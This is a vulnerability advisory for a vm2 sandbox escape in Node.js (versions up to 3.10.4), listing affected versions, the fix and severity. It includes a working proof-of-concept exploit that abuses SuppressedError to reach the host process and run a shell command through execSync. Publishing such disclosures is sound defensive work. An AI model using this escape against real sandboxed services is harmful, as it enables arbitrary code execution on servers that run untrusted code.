CVE-2026-26332: vm2 Sandbox Escape in Node.js Versions Prior to 3.11.0

CVE-2026-26332 GHSA-55hx-c926-fr95
Summary

A security issue in older versions of vm2 for Node.js allows code running inside the sandbox to break out of it and execute arbitrary code in the host process. This is a serious risk, especially for servers that run untrusted code. To fix the issue, update to version 3.11.0 or later.

What to do
  • Update vm2 to version 3.11.0.
Affected software
Ecosystem | Vendor | Product | Affected versions
npm       | –      | vm2     | <= 3.10.4
Fix: upgrade to 3.11.0
Original title
VM2 Has a Sandbox Escape Issue via SuppressedError
Original description
In vm2 v3.10.4 on Node.js v24.13.0, `SuppressedError` allows attackers to escape the sandbox and run arbitrary code.

### PoC
```js
// PoC from the original advisory: run against vm2 3.10.4 on Node.js 24.13.0.
const { VM } = require("vm2");

const vm = new VM();

vm.run(`
  const ds = new DisposableStack();
  ds.defer(() => { throw null; });
  ds.defer(() => {
    const e = Error();
    e.name = Symbol();
    e.stack;
  });
  try {
    ds.dispose();
  } catch (e) {
    const Function = e.suppressed.constructor.constructor;
    const process = new Function("return process;")();
    const { execSync } = process.mainModule.require("node:child_process");
    execSync("echo pwned", { stdio: "inherit" });
  }
`);
```
NVD CVSS 3.1 score: 9.8
Vulnerability type
CWE-94 Code Injection
CWE-693 Protection Mechanism Failure
Published: 5 May 2026 · Updated: 28 May 2026 · First seen: 4 May 2026